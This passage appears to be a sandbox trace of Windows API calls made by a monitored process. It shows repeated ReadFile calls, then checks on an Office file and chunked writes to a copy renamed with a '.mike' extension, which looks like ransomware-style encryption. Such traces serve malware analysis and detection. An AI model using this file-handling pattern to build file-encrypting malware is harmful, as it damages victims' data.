lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.893] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.894] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.894] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.895] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.895] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.895] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.896] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.896] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.896] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.897] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.897] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.897] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.898] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.898] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.898] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.899] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.899] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.900] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.900] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.900] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.901] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.901] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.901] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.902] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.902] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.902] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.903] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.903] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.904] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xc, lpOverlapped=0x0) returned 1 [0050.904] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.904] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.905] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.905] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.905] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.906] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.906] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.906] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.907] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.907] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.908] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.908] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.908] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.909] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0051.612] CloseHandle (hObject=0x278) returned 1 [0051.617] SleepEx (dwMilliseconds=0x100, bAlertable=1) returned 0x0 [0051.872] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.873] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0051.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0051.873] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0051.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0051.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0051.873] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), fInfoLevelId=0x0, lpFileInformation=0x223dab8 | out: lpFileInformation=0x223dab8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360)) returned 1 [0051.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0051.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0051.873] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), fInfoLevelId=0x0, lpFileInformation=0x223dde0 | out: lpFileInformation=0x223dde0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360)) returned 1 [0051.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0051.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0051.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0051.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.875] WriteFile (in: hFile=0x284, lpBuffer=0x223ecbc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x223ecbc*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0051.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0051.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0051.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.876] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0051.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.883] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0051.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.884] SetFilePointer (in: hFile=0x284, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0051.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.885] SetFilePointer (in: hFile=0x284, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0051.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.887] SetFilePointer (in: hFile=0x284, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0051.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.888] SetFilePointer (in: hFile=0x284, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0051.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.889] SetFilePointer (in: hFile=0x284, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0051.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.890] SetFilePointer (in: hFile=0x284, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0051.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 